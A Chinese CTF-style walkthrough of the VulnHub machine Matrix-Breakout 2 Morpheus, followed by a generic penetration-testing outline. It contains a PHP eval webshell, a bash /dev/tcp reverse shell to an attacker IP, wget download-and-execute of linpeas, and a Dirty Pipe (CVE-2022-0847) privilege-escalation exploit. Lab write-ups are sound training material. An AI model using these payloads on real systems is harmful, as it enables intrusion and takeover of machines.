matrix-breakout-2-morpheus已完成

准备环境

1.靶机:Matrix-Breakout: 2 Morpheus

下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

2.用到的知识点

文件上传upload-lab、

php伪协议、

反弹shell、

漏洞收集脚本LINpeas的使用

CVE-2022-0847提权

一:信息收集
1.nmap 网段扫描存活主机:

nmap -sS -T4 192.168.253.0/24

http://192.168.253.131/

在这里插入图片描述在这里插入图片描述

2.端口扫描:

nmap -A -p- 192.168.253.131

开放的端口有22、80、81,有http和ssh服务

在这里插入图片描述

3.目录扫描:

dirb http://192.168.253.131 没有扫描出来

安装gobuster
①更新下载源
apt-get update
②下载
apt-get install gobuster
③查看字典

cd /usr/share/wordlists/dirbuster

④gobuster目录扫描

gobuster dir -u http://192.168.253.131 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/fasttrack.txt
在这里插入图片描述

获取shell
1.登录网页

192.168.253.131/graffiti.php

在这里插入图片描述

2.burpsuite抓包
1).上传一句木马:
<?php @eval($_POST['a']);?>

因为post上传的是txt文件,需要抓包修改一下 改成PHP格式,然后放包

在这里插入图片描述

2).蚁剑连接

在这里插入图片描述

在这里插入图片描述

连接成功过但没有回显

反弹shell

1.可以像上面一样写入反弹shell 脚本

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.253.128/8888 0>&1'");?>

在这里插入图片描述

同样将.txt格式改成.php ,名字随意改,这里我改成了2.php ,一会访问这个2.php

2.攻击机开启监听端口8888

nc -lvvp 8888

然后访问这个2.php反弹shell,反弹成功

在这里插入图片描述

提权
1.试着SUID提权
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

没发现可以利用的文件

2.linpeas
LinPEAS 是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。
该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置
1)下载地址:

https://github.com/carlospolop/PEASS-ng/releases

下载linpeas.sh

2)kali中直接安装linpeas

也可以在kali中直接下载linpeas这个脚本(这个更方便),安装后查看一下里面的文件

在这里插入图片描述

将这个脚本上传到靶机,上传后给脚本赋权 ,然后执行

先起http:

python3 -m http.server 80

下载到靶机上:

wget http://192.168.253.128:80/linpeas_fat.sh

赋权:

chmod +x linpeas_fat.sh

执行:

./linpeas_fat.sh

检测出来的漏洞,CVE-2022-0847

在这里插入图片描述

在kali上下载这个漏洞,在github上下载

git clone https://github.com/imfiver/CVE-2022-0847.git

开启http服务,

python3 -m http.server 80

靶机下载,

wget http://192.168.253.128:80/CVE-2022-0847/Dirty-Pipe.sh

赋权、执行

chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh

在这里插入图片描述

cd /
ls
cat FLAG.txt

在这里插入图片描述

Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值